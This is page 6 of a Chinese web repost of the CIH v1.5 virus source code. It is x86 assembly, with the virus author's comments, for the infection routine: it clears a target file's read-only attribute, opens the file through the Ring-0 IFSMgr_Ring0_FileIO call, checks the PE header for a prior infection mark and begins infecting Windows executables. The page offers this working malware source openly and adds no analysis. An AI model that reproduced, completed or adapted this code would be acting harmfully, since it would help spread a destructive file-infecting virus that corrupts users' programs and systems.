CIH V1.5版本病毒源码(6)

原作者:www.upwinder.com 添加时间:2007-09-02 原文发表:2007-08-31 人气:56 来源：未知

本文章共17222字，分12页，当前第6页，快速翻页：

mov edi, [edi]

; *************************************
; * Is Read-Only File !? *
; *************************************

test cl, 01h
jz OpenFile

; *************************************
逆风编程精品
; * Modify Read-Only File to Write *
; *************************************

mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File *
; *************************************

OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle

; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************

pop ecx
pushf
test cl, 01h
jz IsOpenFileOK

; *************************************
; * Restore Attributes of the File *
; *************************************

mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !? *
; *************************************

IsOpenFileOK:
popf
jc DisableOnBusy

; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetTonewHeader *
; ***************************

xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]

; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************

dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************

cmp dword ptr [esi], 00455000h
jne CloseFile

; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************

; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *

本文章更多内容：<<上一页 - 1 - 2 - 3 - 4 - 5 - 6 - 7 - 8 - 9 - 10 - 11 - 12 - 下一页>>

• 汇编源码--exec

• FASTREBOOT V1.0

• The 808 Virus